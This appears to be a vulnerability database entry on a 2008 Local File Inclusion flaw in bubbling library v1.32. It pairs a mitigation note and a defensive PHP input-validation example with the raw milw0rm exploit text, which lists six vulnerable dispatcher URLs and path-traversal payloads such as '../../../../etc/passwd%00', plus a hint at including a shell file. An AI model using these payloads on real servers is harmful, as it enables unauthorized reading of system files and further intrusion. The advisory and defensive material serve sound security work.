Vendor: bubbling library
By: Stack-Terrorist [v40]
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 98
Product Name: bubbling library
Affected Version From: v1.32
Affected Version To: v1.32
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

bubbling library v1.32 multiple Local File Inclusion Vulnerabilities

bubbling library v1.32 is vulnerable to multiple Local File Inclusion vulnerabilities. An attacker can exploit them by sending a maliciously crafted HTTP request to the vulnerable server, using the vulnerable parameters (page, tpl, uri, etc.) to include a local file on the server. This can lead to the disclosure of sensitive information such as system and application data, and may lead to further attacks.

Mitigation:

The best way to mitigate this vulnerability is to restrict access to the vulnerable parameters and validate the user input.
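
One way to apply the input validation recommended above, as an added PHP example that is not code from bubbling library. It assumes the affected scripts append ".php" to the page/uri value (as the exploit notes suggest); resolve_page() and the template directory are hypothetical names constructed for the demo.

```php
<?php
// Added example, not bubbling library code. resolve_page() is a hypothetical
// helper; the ".php" suffix and template directory are assumptions.

/** Map a request value (page / uri) to a file inside $baseDir, or null. */
function resolve_page(string $name, string $baseDir): ?string
{
    // 1. Allowlist the name: letters, digits, "_" and "-" only. This rejects
    //    "../", absolute paths, "%00" and raw NUL bytes before any file access.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $name) !== 1) {
        return null;
    }
    // 2. Canonicalise, then confirm the target exists inside the base directory.
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    $path = realpath($base . DIRECTORY_SEPARATOR . $name . '.php');
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary template directory holding one page.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'tpl_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/home.php', "<?php echo 'home';\n");

// Constructed inputs: one legitimate name, then values of the kind in the report.
$samples = ['home', '../home', '../../../../etc/passwd%00', "home\0", '/etc/passwd', 'missing'];
foreach ($samples as $s) {
    $ok = resolve_page($s, $dir) !== null;
    printf("%-32s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), $ok ? 'allowed' : 'rejected');
}

unlink($dir . '/home.php');
rmdir($dir);
```

Only the path returned by the helper should ever reach include; a null result should be answered with an error page rather than a fallback include.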

Exploit-DB raw data:

## bubbling library v1.32   multiple Local File Inclusion Vulnerabilities  
## Download script : http://sourceforge.net/project/showfiles.php?group_id=192730
## Author : Stack-Terrorist [v40]
## Email : v.4@hotmail.fr

## Home : http://www.v4-team.com
## to execute the exploit, do not write the extension of the file
## Other files:    =../../../../etc/passwd%00 
## exploit :
#  
# examples/dispatcher/framework/simple.php?page=[local file]&tpl=ajax
http://localhost/ [script] /examples/dispatcher/framework/simple.php?page=../[name of file without php]
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.php?page=../[name of file without php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.tpl.php?uri=../[name of file without php]
# examples/dispatcher/framework/simple.php?page=/home/user/shell
http://localhost/ [script] /examples/dispatcher/framework/yui-menu.tpl.php?uri=../[name of file without php]
http://localhost/ [script] /examples/dispatcher/framework/simple.tpl.php?uri=../[name of file without php]
http://localhost/ [script] /examples/dispatcher/framework/advanced.php?page=../[name of file without php]

Greetz :  H-T Team , v4 Team  , Tryag , no-hack all my friend  
Special tnx for : Houssamix
thx for: Proamk  - djekmani - Jadi - Bohayra - MR.safa7 -Hack3r-b0y - str0ke  

# milw0rm.com [2008-01-26]